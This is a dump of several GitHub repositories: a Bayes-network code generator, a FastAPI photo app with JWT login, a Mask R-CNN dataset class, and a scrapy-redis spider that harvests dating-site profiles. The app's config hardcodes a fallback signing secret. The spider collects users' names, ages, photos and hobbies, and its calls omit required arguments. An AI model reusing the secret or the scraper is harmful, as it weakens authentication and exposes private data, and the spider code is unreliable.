open(classFileName,\"w+\")\n\n self.filename = table_file\n self.name = tableName\n self.modified = time.time()\n\n wb=openpyxl.load_workbook(table_file)\n worksheet = wb[tableName]\n\n\n #Read the keys\n rows = list(worksheet.rows)\n first_row = rows[0]\n second_row = rows[1]\n\n # Read the diagnoses and priors\n diagnoses = []\n prior = []\n probTable = []\n for row in rows[2:]:\n row_values = [c.value for c in row if c.value is not None]\n\n if len(row_values) ==0:\n break\n\n if row_values[0] is None:\n break\n diagnoses.append(row_values[0])\n prior.append(row_values[1])\n probTable.append(row_values[2:])\n probTable = np.array(probTable)/100.0\n\n prior = np.array(prior)\n prior = prior/100.0\n states = []\n for d in diagnoses:\n dx = \"\\'\" + d + \"\\'\"\n states.append(dx)\n states = \",\".join(states)\n priorString = \"[\"\n for i in range(len(prior) ):\n if ( i > 0 ):\n priorString += \",\"\n priorString += str(prior[i])\n priorString += \"]\"\n\n print(probTable)\n\n\n\n\n file.write( \"from easybayesy import NaiveBayesNetworkNode, NaiveBayesNetwork\\n\")\n file.write( \"import numpy as np\\n\")\n file.write( \"import openpyxl\\n\")\n file.write( \"from openpyxl import Workbook, load_workbook\\n\\n\")\n\n file.write( \"def \" + className + \"(): \\n \")\n file.write( \" network = NaiveBayesNetwork(); \\n\\n\" )\n\n file.write( \" dx = NaiveBayesNetworkNode(\\'Diagnosis\\'\" + \",[\" + states + \"]) \\n\" )\n file.write( \" dx.category=\\'Diagnosis\\' \\n\" )\n file.write( \" nDx = \" + str(len(diagnoses)) + \"\\n\" )\n file.write( \" dx.priors = np.array( \" + priorString + \") \\n\" )\n\n file.write( \" network.add_node(dx) \\n\\n\")\n\n nDx = len(diagnoses)\n\n\n keys = [c.value for c in first_row]\n values = [c.value for c in second_row]\n\n values = [v for v in values if v is not None]\n keys = keys[:len(values)]\n\n values = values[2:]\n keys = keys[2:]\n\n key_value_dict = {}\n\n current_k = \"\"\n for k, v, i in zip(keys, values, range(2, len(values) + 2)):\n if k is not None:\n current_k = k.split(\" \")[0]\n print(current_k)\n key_value_dict[current_k] = {v.split(\" \")[0]:i - 2}\n\n else:\n key_value_dict[current_k][v.split(\" \")[0]] = i - 2\n\n\n categories = []\n for k in key_value_dict.keys():\n vals = key_value_dict[k]\n 
print(k)\n print(vals.values())\n kProbs = []\n for v in vals.values():\n kProbs.append( probTable[:,v])\n kProbs = np.array(kProbs)\n print(kProbs)\n\n kProbString = \"[ \"\n for i in range(kProbs.shape[0]):\n kProbString += \"[ \"\n for j in range(kProbs.shape[1]):\n p = kProbs[i,j]\n kProbString += str(p)\n if ( j < kProbs.shape[1]-1 ):\n kProbString += \",\"\n else:\n kProbString += \" ]\"\n if ( i < kProbs.shape[0]-1 ):\n kProbString += \", \"\n else:\n kProbString += \" ]\"\n\n nodeName = k.split(\":\")[1]\n nodeCat = k.split(\":\")[0]\n categories.append(nodeCat)\n\n states = []\n probs = np.array( (len(vals), nDx ))\n for v in vals:\n state = \"\\'\" + str(v) + \"\\'\"\n states.append(state)\n\n states = \",\".join(states)\n\n file.write( \" n = NaiveBayesNetworkNode('\" + nodeName + \"'\" + \",[\" + states + \"]) \\n\" )\n file.write( \" n.category = '\" + nodeCat + \"'\\n\");\n file.write( \" n.parent = \\'Diagnosis\\' \\n\" )\n file.write( \" n.probs = np.array( \" + kProbString + \").transpose() \\n\")\n file.write( \" network.add_node(n) \\n\\n\")\n\n file.write( \" network.categories = ['Signal', 'Spatial', 'Clinical'] \\n\" )\n file.write( \" return network\\n\");\n\n file.close()\n return 0\n\n #return disease, prob, key_value_dict\n"
}
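The core of `get_diagnoses` above is a naive-Bayes posterior: stack the diagnosis prior with one likelihood column per observed feature, take the column-wise product, and normalize. A toy NumPy version with made-up numbers (three hypothetical diagnoses, two observed features):

```python
import numpy as np

prior = np.array([0.5, 0.3, 0.2])   # P(diagnosis)
feature_likelihoods = [
    np.array([0.9, 0.2, 0.4]),      # P(observed state of feature 1 | diagnosis)
    np.array([0.1, 0.8, 0.5]),      # P(observed state of feature 2 | diagnosis)
]

mat = np.vstack([prior] + feature_likelihoods)
posterior = np.prod(mat, axis=0)    # unnormalized posterior per diagnosis
posterior = posterior / posterior.sum()
ranking = np.argsort(posterior)[::-1]  # diagnoses, most likely first

print(posterior)  # e.g. [0.36 0.384 0.256] after normalization
print(ranking)    # indices sorted by posterior, descending
```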
] | 4 |
santosh/picturesfast
|
https://github.com/santosh/picturesfast
|
706cc72a4933fb3e64fa119f176a334fba1350e0
|
72394533dfc06ce5c3cf5f467c87d757537cf221
|
c3673b5b982e0f0edda263ace372df0db63440a7
|
refs/heads/master
| 2023-08-01T02:52:36.178084 | 2021-09-04T03:28:37 | 2021-09-04T03:29:15 | 402,948,952 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7927135825157166,
"alphanum_fraction": 0.7927135825157166,
"avg_line_length": 33.60869598388672,
"blob_id": "03e3b7d7f4f95a89ff14b1f711de6a1195367c84",
"content_id": "dce576eebb94e2e0634b4af7ccf4c232f90f229b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 23,
"path": "/README.md",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "# santosh.pictures\n\n<santosh.pictures> is a photo management application originally written in Go, but ported to FastAPI in early stage. It uses Postgres for storing metadata of the images and the application's own data.\n\n## Stack\n\n- FastAPI backend.\n- Microservices architecture with Bealstalk as platform.\n- Database runs on different container in same beanstalk environment.\n- Traefik - TODO: Let's Encrypt\n\n## Development\n\n* We use `tiangolo/sqlmodel` for both validation and data modeling. `sqlmodel` brings pydantic and SQLAlchemy together.\n\n## Metadata\n\nThis project is a part of application I developed during AWS Certified Developer Assciate Exam. \n\nStrategies for application growth:\n\n- Deploy it on Elastic Beanstalk and have it scale\n- Try decoupling components sub/pub architecture.\n"
},
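The README mentions that `sqlmodel` serves as both the pydantic schema and the SQLAlchemy model. A minimal sketch of that idea — the `Photo` table and its fields are assumptions for illustration, not the repo's actual models:

```python
from typing import Optional
from sqlmodel import Field, SQLModel, create_engine

class Photo(SQLModel, table=True):
    # One class acts as both the validation schema and the ORM table.
    id: Optional[int] = Field(default=None, primary_key=True)
    title: str
    s3_key: str

# SQLite here just for the sketch; the deployment described above uses Postgres.
engine = create_engine("sqlite://")
SQLModel.metadata.create_all(engine)
```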
{
"alpha_fraction": 0.611872136592865,
"alphanum_fraction": 0.8082191944122314,
"avg_line_length": 42.79999923706055,
"blob_id": "d4c6df0b988dad8ee45034afad5656765564d92f",
"content_id": "fbe3af9025e62cd2cf7e9ab37be7069ec885c208",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 5,
"path": "/backend/config/config.py",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "import os\n\nPICTURES_SECRET_KEY = os.getenv(\"PICTURES_SECRET_KEY\", \"ac9dd0517ef9da9bd6a53c0d92f461f333037ea922f590a28c20f1f0fa6f102a\")\nJWT_ALGORITHM = os.getenv(\"JWT_ALGORITHM\", \"HS256\")\nACCESS_TOKEN_EXPIRE_MINUTES = 30\n"
},
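The config module above relies on `os.getenv` fallbacks, so a deployment can override each setting through the environment without code changes. A quick demonstration of that behavior:

```python
import os

# When the variable is set, the environment value wins; otherwise the
# second argument is returned as the fallback.
os.environ["JWT_ALGORITHM"] = "HS512"
print(os.getenv("JWT_ALGORITHM", "HS256"))    # HS512 (env wins)
print(os.getenv("UNSET_SETTING", "default"))  # default (fallback)
```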
{
"alpha_fraction": 0.7682020664215088,
"alphanum_fraction": 0.7726597189903259,
"avg_line_length": 25.920000076293945,
"blob_id": "d1c7076bd41f00b6a15b74b993fc25f7479ec4f6",
"content_id": "e2d1fd645d6568ecac0b94049eb32577d1ccddd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 673,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/backend/main.py",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "from datetime import timedelta\n\nfrom fastapi import FastAPI, APIRouter, Depends, Request, HTTPException, status\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.responses import HTMLResponse\n\n# from routers import photo\nfrom routers import user\n\n# from db import models\n\napp = FastAPI()\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\[email protected](\"/\", response_class=HTMLResponse)\nasync def get_homepage(request: Request):\n return templates.TemplateResponse(\"index.html\", { \"request\": request })\n\n\n# /api router\napi = APIRouter()\napp.include_router(user.router)\n# api.include_router(photo.router, prefix=\"/photos\")\napp.include_router(api, prefix=\"/api/v1\")\n"
},
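`main.py` above composes routers with `include_router(..., prefix="/api/v1")`, so anything registered on the `api` router is served under that prefix. A self-contained sketch of how the prefix composes (the `/ping` route is hypothetical):

```python
from fastapi import APIRouter, FastAPI
from fastapi.testclient import TestClient

app = FastAPI()
api = APIRouter()

@api.get("/ping")
def ping():
    return {"ok": True}

# Including the router with a prefix mounts the route at /api/v1/ping.
app.include_router(api, prefix="/api/v1")

client = TestClient(app)
assert client.get("/api/v1/ping").json() == {"ok": True}
```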
{
"alpha_fraction": 0.5390428304672241,
"alphanum_fraction": 0.5994962453842163,
"avg_line_length": 21.05555534362793,
"blob_id": "c54100b05e169c8e136ecd7ca8307076c3bfe0d3",
"content_id": "cdaae55c91fabb499869b460e07f742f7fa375ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 18,
"path": "/backend/Pipfile",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nfastapi = \"==0.68.0\"\njinja2 = \"==3.0.1\"\nuvicorn = {extras = [\"standard\"], version = \"==0.14.0\"}\nsqlalchemy = \"==1.4.22\"\npasslib = {extras = [\"bcrypt\"], version = \"*\"}\npython-multipart = \"==0.0.5\"\npython-jose = {extras = [\"cryptography\"], version = \"==3.3.0\"}\n\n[dev-packages]\n\n[requires]\npython_version = \"3.7\"\n"
},
{
"alpha_fraction": 0.6780444979667664,
"alphanum_fraction": 0.6820083856582642,
"avg_line_length": 30.971830368041992,
"blob_id": "da6500156e1c50c90cc6a754302918760289eafa",
"content_id": "a612a40fde3f349c62f1e85c1ffba40a5a0c0f62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4541,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 142,
"path": "/backend/routers/user.py",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "from datetime import datetime, timedelta\nfrom typing import Optional\nfrom pydantic import BaseModel\nfrom passlib.context import CryptContext\nfrom fastapi import Depends, HTTPException, APIRouter, status\nfrom fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm\nfrom jose import JWTError, jwt\n\nimport config\n\nfake_users_db = {\n \"johndoe\": {\n \"username\": \"johndoe\",\n \"full_name\": \"John Doe\",\n \"email\": \"[email protected]\",\n \"hashed_password\": \"$2b$12$EixZaYVK1fsbw1ZfbX3OXePaWxn96p36WQoeG6Lruj3vjPGga31lW\",\n \"disabled\": False,\n },\n}\n\n# uses bcrypt for hashing password\npwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\")\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"token\")\n\nclass User(BaseModel):\n username: str\n email: Optional[str] = None\n first_name: Optional[str] = None\n last_name: Optional[str] = None\n disabled: Optional[bool] = None\n\nclass UserInDB(User):\n hashed_password: str\n\nclass Token(BaseModel):\n access_token: str\n token_type: str\n\nclass TokenData(BaseModel):\n username: Optional[str] = None\n\n\ndef verify_password(plain_password, hashed_password):\n return pwd_context.verify(plain_password, hashed_password)\n\ndef get_password_hash(password):\n return pwd_context.hash(password)\n\ndef get_user(db, username: str):\n if username in db:\n user_dict = db[username]\n return UserInDB(**user_dict)\n\ndef authenticate_user(db, username: str, password: str):\n user = get_user(db, username)\n if not user:\n return False\n if not verify_password(password, user.hashed_password):\n return False\n return user\n\ndef create_access_token(data: dict, expires_delta: Optional[timedelta] = None):\n to_encode = data.copy()\n if expires_delta:\n expire = datetime.utcnow() + expires_delta\n else:\n expire = datetime.utcnow() + timedelta(minutes=config.ACCESS_TOKEN_EXPIRE_MINUTES)\n to_encode.update({\"exp\": expire})\n encoded_jwt = jwt.encode(to_encode, config.PICTURES_SECRET_KEY, algorithm=config.JWT_ALGORITHM)\n return encoded_jwt\n\nasync def get_current_user(token: str = Depends(oauth2_scheme)):\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication credentials\",\n headers={\"WWW-Authentication credentials\"},\n )\n\n try:\n payload = jwt.decode(token, config.PICTURES_SECRET_KEY, algorithms=[config.JWT_ALGORITHM])\n username: str = payload.get(\"sub\")\n if username is None:\n raise credentials_exception\n token_data = TokenData(username=username)\n except JWTError:\n raise credentials_exception\n\n user = get_user(fake_users_db, username=token_data.username)\n\n if not user:\n raise credentials_exception\n return user\n\nasync def get_current_active_user(current_user: User = Depends(get_current_user)):\n if current_user.disabled:\n raise HTTPException(status_code=400, detail=\"Inactive user\")\n return current_user\n\n\nrouter = APIRouter()\n\n# POST /user/login\[email protected](\"/token\", tags=[\"users\"], summary=\"Login an existing user\")\nasync def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends()):\n \"\"\"Login a user given the username and password. 
A JWT token\n is sent on the success, or 401 response on failure.\n\n - **username**: username to login with\n - **password**: password for username\n \"\"\"\n user = authenticate_user(fake_users_db, form_data.username, form_data.password)\n if not user:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect surename or password\",\n headers={\"WWW-Authenticate\": \"Bearer\"}\n )\n access_token_expires = timedelta(minutes=config.ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(\n data={\"sub\": user.username}, expires_delta=access_token_expires\n )\n\n return {\"access_token\": access_token, \"token_type\": \"bearer\"}\n\n\[email protected](\"/me\", response_model=User, tags=[\"users\"], summary=\"Login an existing user\")\nasync def get_logged_in_user(current_user: User = Depends(get_current_active_user)):\n return current_user\n\n\n# POST /user/register\n# @router.post(\"/\", tags=[\"users\"], summary=\"Register a new user\")\n# async def login_user(request: Request, user: User):\n# \"\"\"Register a new user. A username, password and email is required.\n\n# - **username**: username to login with\n# - **password**: password for username\n# - **email**: email of username\n# \"\"\"\n# pass\n\n# GET /user/profile/:id\n\n"
}
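A sketch of exercising the token flow above end-to-end with FastAPI's `TestClient`. It assumes you run it from the `backend/` directory so `main` imports, and that the bcrypt hash in `fake_users_db` corresponds to the password `"secret"` (it matches the hash used in the well-known FastAPI tutorial, but that is an assumption):

```python
from fastapi.testclient import TestClient
from main import app  # the FastAPI app from this repo's main.py

client = TestClient(app)

# OAuth2PasswordRequestForm expects form-encoded username/password.
resp = client.post("/token", data={"username": "johndoe", "password": "secret"})
token = resp.json()["access_token"]

# The bearer token returned by /token authorizes the /me endpoint.
me = client.get("/me", headers={"Authorization": f"Bearer {token}"})
print(me.json())  # the User model for johndoe
```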
] | 5 |
yenchenlin/maskrcnn-benchmark
|
https://github.com/yenchenlin/maskrcnn-benchmark
|
93ec53314c4f3240ce177cef0cc3600a5d2be494
|
d8f34136c719190770d1f2ecccdbe13c9a8ee025
|
df2e58d6f7966e48f7a977b3471669bfeabab900
|
refs/heads/master
| 2020-04-25T06:56:16.571468 | 2019-02-26T20:50:40 | 2019-02-26T20:50:40 | 172,598,115 | 1 | 0 |
MIT
| 2019-02-25T22:50:42 | 2019-02-25T18:25:52 | 2019-02-25T20:44:01 | null |
[
{
"alpha_fraction": 0.6401017308235168,
"alphanum_fraction": 0.6477320790290833,
"avg_line_length": 29.636363983154297,
"blob_id": "144da156423789ed21c78045672b861c4ea7e855",
"content_id": "d84a69a8dc5aa9bb8e807a7fcecbd36c6cf33247",
"detected_licenses": [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2359,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 77,
"path": "/maskrcnn_benchmark/data/datasets/omnipush.py",
"repo_name": "yenchenlin/maskrcnn-benchmark",
"src_encoding": "UTF-8",
"text": "# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport torch\nimport torchvision\nimport numpy as np\nimport glob\nimport os\n\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\nfrom maskrcnn_benchmark.structures.center import Center\n\n\nmin_keypoints_per_image = 1\n\n\ndef _count_visible_keypoints(anno):\n return sum(sum(1 for v in ann[\"keypoints\"][2::3] if v > 0) for ann in anno)\n\n\ndef _has_only_empty_bbox(anno):\n return all(any(o <= 1 for o in obj[\"bbox\"][2:]) for obj in anno)\n\n\ndef has_valid_annotation(anno):\n # if it's empty, there is no annotation\n if len(anno) == 0:\n return False\n # if all boxes have close to zero area, there is no annotation\n if _has_only_empty_bbox(anno):\n return False\n # keypoints task have a slight different critera for considering\n # if an annotation is valid\n if \"keypoints\" not in anno[0]:\n return True\n # for keypoint detection tasks, only consider valid images those\n # containing at least min_keypoints_per_image\n if _count_visible_keypoints(anno) >= min_keypoints_per_image:\n return True\n return False\n\n\nclass OmnipushDataset(Dataset):\n def __init__(self, root, ann_file, transforms=None):\n self.img_names = glob.glob(os.path.join(root, '*.jpg'))\n self.annos = np.load(ann_file).item()\n self.transforms = transforms\n\n def __len__(self):\n return len(self.img_names)\n\n def __getitem__(self, idx):\n img = Image.open(self.img_names[idx]).convert('RGB')\n anno = self.annos[self.img_names[idx].split('/')[-1]]\n\n boxes = [anno['bbox']]\n boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes\n target = BoxList(boxes, img.size, mode=\"xyxy\")\n\n classes = [anno['class']]\n classes = torch.tensor(classes)\n target.add_field(\"labels\", classes)\n\n center = [anno['center']]\n center = Center(center, img.size)\n target.add_field(\"keypoints\", center)\n\n # ensure bbox is legit\n target = target.clip_to_image(remove_empty=True)\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, idx\n\n def get_img_info(self, index):\n return {\"height\": 640, \"width\": 640}\n"
},
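A usage sketch for the dataset above. The paths are placeholders; the class expects a folder of `.jpg` files plus a `.npy` annotation dict keyed by file name (and `np.load(...).item()` assumes a NumPy version where pickled loads are allowed by default). Because each sample's target is a `BoxList`, batching needs a `collate_fn` that keeps samples as lists instead of stacking tensors:

```python
from torch.utils.data import DataLoader
from maskrcnn_benchmark.data.datasets.omnipush import OmnipushDataset

dataset = OmnipushDataset(root="datasets/omnipush/images",
                          ann_file="datasets/omnipush/annotations.npy")

img, target, idx = dataset[0]  # PIL image, BoxList target, sample index
print(target.bbox, target.get_field("labels"))

# Keep variable-sized targets as tuples rather than stacked tensors.
loader = DataLoader(dataset, batch_size=2,
                    collate_fn=lambda batch: tuple(zip(*batch)))
```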
{
"alpha_fraction": 0.5604601502418518,
"alphanum_fraction": 0.5708935260772705,
"avg_line_length": 32.98181915283203,
"blob_id": "b35a790df3a017805085e93b6a37ec498a98c12d",
"content_id": "1b7096c984a5ab3d65dcd19355691ee577d6a121",
"detected_licenses": [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3738,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 110,
"path": "/maskrcnn_benchmark/structures/center.py",
"repo_name": "yenchenlin/maskrcnn-benchmark",
"src_encoding": "UTF-8",
"text": "import torch\n\n\n# transpose\nFLIP_LEFT_RIGHT = 0\n\nclass Center(object):\n def __init__(self, keypoints, size, mode=None):\n # FIXME remove check once we have better integration with device\n # in my version this would consistently return a CPU tensor\n device = keypoints.device if isinstance(keypoints, torch.Tensor) else torch.device('cpu')\n keypoints = torch.as_tensor(keypoints, dtype=torch.float32, device=device)\n num_keypoints = keypoints.shape[0]\n if num_keypoints:\n keypoints = keypoints.view(num_keypoints, -1, 3)\n\n # TODO should I split them?\n # self.visibility = keypoints[..., 2]\n self.keypoints = keypoints# [..., :2]\n self.size = size\n self.mode = mode\n self.extra_fields = {}\n\n def crop(self, box):\n raise NotImplementedError()\n\n def resize(self, size, *args, **kwargs):\n ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(size, self.size))\n ratio_w, ratio_h = ratios\n resized_data = self.keypoints.clone()\n resized_data[..., 0] *= ratio_w\n resized_data[..., 1] *= ratio_h\n keypoints = type(self)(resized_data, size, self.mode)\n for k, v in self.extra_fields.items():\n keypoints.add_field(k, v)\n return keypoints\n\n def transpose(self, method):\n if method not in (FLIP_LEFT_RIGHT,):\n raise NotImplementedError(\n \"Only FLIP_LEFT_RIGHT implemented\")\n\n flipped_data = [[self.size[1] - self.keypoints[0, 0, 0], self.keypoints[0, 0, 1], 2.0]]\n keypoints = type(self)(flipped_data, self.size, self.mode)\n return keypoints\n\n def to(self, *args, **kwargs):\n keypoints = type(self)(self.keypoints.to(*args, **kwargs), self.size, self.mode)\n for k, v in self.extra_fields.items():\n if hasattr(v, \"to\"):\n v = v.to(*args, **kwargs)\n keypoints.add_field(k, v)\n return keypoints\n\n def __getitem__(self, item):\n keypoints = type(self)(self.keypoints[item], self.size, self.mode)\n for k, v in self.extra_fields.items():\n keypoints.add_field(k, v[item])\n return keypoints\n\n def add_field(self, field, field_data):\n self.extra_fields[field] = field_data\n\n def get_field(self, field):\n return self.extra_fields[field]\n\n def __repr__(self):\n s = self.__class__.__name__ + '('\n s += 'num_instances={}, '.format(len(self.keypoints))\n s += 'image_width={}, '.format(self.size[0])\n s += 'image_height={})'.format(self.size[1])\n return s\n\n\n# TODO make this nicer, this is a direct translation from C2 (but removing the inner loop)\ndef keypoints_to_heat_map(keypoints, rois, heatmap_size):\n if rois.numel() == 0:\n return rois.new().long(), rois.new().long()\n offset_x = rois[:, 0]\n offset_y = rois[:, 1]\n scale_x = heatmap_size / (rois[:, 2] - rois[:, 0])\n scale_y = heatmap_size / (rois[:, 3] - rois[:, 1])\n\n offset_x = offset_x[:, None]\n offset_y = offset_y[:, None]\n scale_x = scale_x[:, None]\n scale_y = scale_y[:, None]\n\n x = keypoints[..., 0]\n y = keypoints[..., 1]\n\n x_boundary_inds = x == rois[:, 2][:, None]\n y_boundary_inds = y == rois[:, 3][:, None]\n\n x = (x - offset_x) * scale_x\n x = x.floor().long()\n y = (y - offset_y) * scale_y\n y = y.floor().long()\n\n x[x_boundary_inds] = heatmap_size - 1\n y[y_boundary_inds] = heatmap_size - 1\n\n valid_loc = (x >= 0) & (y >= 0) & (x < heatmap_size) & (y < heatmap_size)\n vis = keypoints[..., 2] > 0\n valid = (valid_loc & vis).long()\n\n lin_ind = y * heatmap_size + x\n heatmaps = lin_ind * valid\n\n return heatmaps, valid\n"
}
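A small worked example for `keypoints_to_heat_map` above: one RoI spanning (0, 0)-(100, 100) and one visible keypoint at (50, 50), mapped into a 56×56 heatmap. The coordinate scales by `56 / 100`, so `x = floor(50 * 0.56) = 28` (likewise for `y`), giving linear index `y * 56 + x = 1596`:

```python
import torch
from maskrcnn_benchmark.structures.center import keypoints_to_heat_map

rois = torch.tensor([[0.0, 0.0, 100.0, 100.0]])     # (N, 4) boxes, xyxy
keypoints = torch.tensor([[[50.0, 50.0, 2.0]]])     # (N, K, 3): x, y, visibility

heatmaps, valid = keypoints_to_heat_map(keypoints, rois, heatmap_size=56)

print(heatmaps)  # tensor([[1596]]) -- 28 * 56 + 28
print(valid)     # tensor([[1]]) -- in-bounds and visibility > 0
```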
] | 2 |
zhaoqidev/Affinity
|
https://github.com/zhaoqidev/Affinity
|
92d36bea652023eae664854412f90d34ba145b1e
|
e4d659fb7085634ea48fcbc704a1da92724e02d2
|
f653c49c1345d502d57490d150d6447681fa8c66
|
refs/heads/master
| 2020-03-08T15:56:59.967330 | 2018-04-05T15:30:44 | 2018-04-05T15:30:44 | 128,225,928 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6174496412277222,
"alphanum_fraction": 0.6191275119781494,
"avg_line_length": 26.090909957885742,
"blob_id": "01eb6fc057b3e2dad5ddc270f89a9a3d32185ef3",
"content_id": "74973d9808f0287ad3d944ebf37342331c5e1047",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 22,
"path": "/you_yuan/you_yuan/items.py",
"repo_name": "zhaoqidev/Affinity",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass YouYuanItem(scrapy.Item):\n user_name = scrapy.Field() # 用户名\n age = scrapy.Field() # 年龄\n head_url = scrapy.Field() # 头像ur\n image_url = scrapy.Field() # 相册\n content = scrapy.Field() # 简介\n place_home = scrapy.Field() # 籍贯\n education = scrapy.Field() # 教育\n hobby = scrapy.Field() # 爱好\n source = scrapy.Field() # 主页地址\n time = scrapy.Field() # utc 时间\n spider = scrapy.Field() # 爬虫时间\n"
},
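`scrapy.Item` subclasses like the one above behave as dicts restricted to their declared `Field`s, which catches field-name typos at assignment time. A quick sketch:

```python
from you_yuan.items import YouYuanItem

item = YouYuanItem()
item["user_name"] = "example"
item["age"] = "25"
print(dict(item))  # {'user_name': 'example', 'age': '25'}

# Assigning an undeclared key raises KeyError instead of silently succeeding.
try:
    item["nickname"] = "x"
except KeyError as exc:
    print(exc)  # YouYuanItem does not support field: nickname
```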
{
"alpha_fraction": 0.5537122488021851,
"alphanum_fraction": 0.5605112910270691,
"avg_line_length": 31.83035659790039,
"blob_id": "19f21a8ff2e0b69b03f925370d795de63025e564",
"content_id": "9c1ab96167cf72f53e80aabac8d88c45f4a2a239",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3699,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 112,
"path": "/you_yuan/you_yuan/spiders/my_spider.py",
"repo_name": "zhaoqidev/Affinity",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport re\nimport time\n\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import Rule\nfrom scrapy_redis.spiders import RedisCrawlSpider\n\nfrom you_yuan.items import YouYuanItem\n\n\nclass MySpiderSpider(RedisCrawlSpider):\n name = 'my'\n # allowed_domains = ['youyuan.com']\n # start_urls = ['http://youyuan.com/']\n redis_key = \"you_yuan: start spider\" # 主redis发布的令牌\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n 动态获取domain\n :param args:\n :param kwargs:\n \"\"\"\n domain = kwargs.pop('domain', '')\n self.allow_domains = filter(None, domain.strip(','))\n super(MySpiderSpider, self).__init__(*args, **kwargs)\n\n page_links = LinkExtractor(allow=r\"youyuan.com/find/beijing/mm18-26/advance-0-0-0-0-0-0-0/p\\d+/\")\n profile_links = LinkExtractor(allow=r\"youyuan.com/\\d+-profile/\")\n\n rules = (\n Rule(page_links),\n Rule(profile_links, callback='parse_item'),\n )\n\n def parse_item(self, response):\n item = YouYuanItem()\n\n item['user_name'] = self.get_user_name()\n item['age'] = self.get_age()\n item['head_url'] = self.get_header_url()\n item['image_url'] = self.get_images_url()\n item['content'] = self.get_content()\n item['place_home'] = self.get_place_from()\n item['education'] = self.get_education()\n item['hobby'] = self.get_hobby()\n item['source'] = response.url\n yield item\n\n def get_user_name(self, response):\n username = response.xpath(\"//dl[@class='personal_cen']//div[@class='main']/strong/text()\").extract()\n if len(username):\n username = username[0]\n else:\n username = \"NULL\"\n return username.strip()\n\n def get_age(self, response):\n age = response.xpath(\"//dl[@class='personal_cen']//dd/p/text()\").extract()\n if len(age):\n age = re.findall(u\"\\d+岁\", age[0])[0]\n else:\n age = \"NULL\"\n return age.strip()\n\n def get_header_url(self, response):\n header_url = response.xpath(\"//dl[@class='personal_cen']/dt/img/@src\").extract()\n if len(header_url):\n header_url = header_url[0]\n else:\n header_url = \"NULL\"\n return header_url.strip()\n\n def get_images_url(self, response):\n images_url = response.xpath(\"//div[@class='ph_show']/ul/li/a/img/@src\").extract()\n if len(images_url):\n images_url = \", \".join(images_url)\n else:\n images_url = \"NULL\"\n return images_url\n\n def get_content(self, response):\n content = response.xpath(\"//div[@class='pre_data']/ul/li/p/text()\").extract()\n if len(content):\n content = content[0]\n else:\n content = \"NULL\"\n return content.strip()\n\n def get_place_from(self, response):\n place_from = response.xpath(\"//div[@class='pre_data']/ul/li[2]//ol[1]/li[1]/span/text()\").extract()\n if len(place_from):\n place_from = place_from[0]\n else:\n place_from = \"NULL\"\n return place_from.strip()\n\n def get_education(self, response):\n education = response.xpath(\"//div[@class='pre_data']/ul/li[3]//ol[2]/li[2]/span/text()\").extract()\n if len(education):\n education = education[0]\n else:\n education = \"NULL\"\n return education.strip()\n\n def get_hobby(self, response):\n hobby = response.xpath(\"//dl[@class='personal_cen']//ol/li/text()\").extract()\n if len(hobby):\n hobby = \",\".join(hobby).replace(\" \", \"\")\n else:\n hobby = \"NULL\"\n return hobby.strip()\n"
},
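A `RedisCrawlSpider` like the one above idles until a start URL is pushed onto its `redis_key` list, so the crawl is kicked off from the master side. A sketch using redis-py (the URL is illustrative; the key must match the spider's `redis_key` exactly):

```python
import redis

r = redis.Redis(host="127.0.0.1", port=6379, db=0)
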